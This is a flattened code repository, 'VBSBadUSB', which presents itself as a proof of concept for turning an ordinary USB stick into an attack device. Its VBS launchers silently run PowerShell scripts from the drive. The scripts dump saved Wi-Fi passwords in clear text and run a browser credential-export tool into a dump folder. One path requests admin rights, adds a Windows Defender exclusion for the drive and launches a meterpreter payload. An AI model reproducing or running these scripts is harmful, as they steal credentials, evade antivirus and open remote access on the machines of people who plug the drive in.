├── export-browser ├── Attacks │ └── export-browser │ │ ├── Dump │ │ └── a │ │ ├── export-browser.exe │ │ └── export-browser.ps1 └── export-browser.VBS ├── export-wifi ├── Attacks │ └── export-wifi │ │ ├── Dump │ │ └── a │ │ └── export-wifi.ps1 └── export-wifi.VBS ├── meterpreter ├── Attacks │ └── meterpreter │ │ ├── meterpreter.exe │ │ ├── mtonce.ps1 │ │ └── MAIN.vbs └── meterpreter.vbs └── README.md /export-browser/Attacks/export-browser/Dump/a: -------------------------------------------------------------------------------- 1 | a -------------------------------------------------------------------------------- /export-wifi/Attacks/export-wifi/Dump/a: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /meterpreter/Attacks/meterpreter/meterpreter.exe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # VBSBadUSB 2 | Proof Of Concept For Creating Bad USB via Normal USB. 3 | -------------------------------------------------------------------------------- /export-browser/Attacks/export-browser/export-browser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/VBSBadUSB/main/export-browser/Attacks/export-browser/export-browser.exe -------------------------------------------------------------------------------- /meterpreter/Attacks/meterpreter/mtonce.ps1: -------------------------------------------------------------------------------- 1 | $USBDrive = get-psdrive |where {$_.Root -match ":"} |% {if (Test-Path ($_.Root + "Attacks")){$_.Root}} 2 | Add-MpPreference -ExclusionPath $USBDrive 3 | & "$USBDrive\Attacks\meterpreter\meterpreter.exe" 4 | -------------------------------------------------------------------------------- /export-browser/export-browser.VBS: -------------------------------------------------------------------------------- 1 | Set FSO = CreateObject("Scripting.FileSystemObject") 2 | set script=CreateObject("wscript.shell") 3 | strPath = FSO.GetParentFolderName (WScript.ScriptFullName) 4 | script.run "powershell IEX (New-Object Net.WebClient).DownloadString('file://" & strPath & "\Attacks\HB\hb.ps1')", 0 -------------------------------------------------------------------------------- /export-wifi/export-wifi.VBS: -------------------------------------------------------------------------------- 1 | Set FSO = CreateObject("Scripting.FileSystemObject") 2 | set script=CreateObject("wscript.shell") 3 | strPath = FSO.GetParentFolderName (WScript.ScriptFullName) 4 | script.run "powershell IEX (New-Object Net.WebClient).DownloadString('file://" & strPath & "\Attacks\export-wifi\export-wifi.ps1')", 0 -------------------------------------------------------------------------------- /meterpreter/meterpreter.vbs: -------------------------------------------------------------------------------- 1 | Set objShell = CreateObject("Shell.Application") 2 | Set FSO = CreateObject("Scripting.FileSystemObject") 3 | strPath = FSO.GetParentFolderName (WScript.ScriptFullName) 4 | objShell.ShellExecute "wscript.exe", _ 5 | Chr(34) & strPath & "\Attacks\meterpreter\MAIN.VBS" & Chr(34), "", "runas", 1 -------------------------------------------------------------------------------- /export-wifi/Attacks/export-wifi/export-wifi.ps1: -------------------------------------------------------------------------------- 1 | $USBDrive = get-psdrive |where {$_.Root -match ":"} |% {if (Test-Path ($_.Root + "Attacks")){$_.Root}} 2 | mkdir "$USBDrive\Attacks\WPASS\Dump\$env:COMPUTERNAME-$env:USERNAME" 3 | Set-Location "$USBDrive\Attacks\export-wifi\Dump\$env:COMPUTERNAME-$env:USERNAME" 4 | netsh wlan export profile key=clear -------------------------------------------------------------------------------- /export-browser/Attacks/export-browser/export-browser.ps1: -------------------------------------------------------------------------------- 1 | $USBDrive = get-psdrive |where {$_.Root -match ":"} |% {if (Test-Path ($_.Root + "Attacks")){$_.Root}} 2 | mkdir "$USBDrive\Attacks\export-browser\Dump\$env:COMPUTERNAME-$env:USERNAME" 3 | Set-Location "$USBDrive\Attacks\export-browser\Dump\$env:COMPUTERNAME-$env:USERNAME" 4 | & "$USBDrive\Attacks\export-browser\export-browser.exe" --format json -------------------------------------------------------------------------------- /meterpreter/Attacks/meterpreter/MAIN.vbs: -------------------------------------------------------------------------------- 1 | set script=CreateObject("wscript.shell") 2 | Function FileExists(FilePath) 3 | Set fso = CreateObject("Scripting.FileSystemObject") 4 | If fso.FileExists(FilePath) Then 5 | FileExists=CBool(1) 6 | Else 7 | FileExists=CBool(0) 8 | End If 9 | End Function 10 | 11 | Set objFSO = CreateObject("Scripting.FileSystemObject") 12 | 13 | Set colDrives = objFSO.Drives 14 | 15 | For Each objDrive in colDrives 16 | If FileExists (objDrive & "\Attacks\meterpreter\meterpreter.ps1") Then 17 | script.run "powershell IEX (New-Object Net.WebClient).DownloadString('file://" & objdrive & "\Attacks\meterpreter\meterpreter.ps1')", 0 18 | End If 19 | Next --------------------------------------------------------------------------------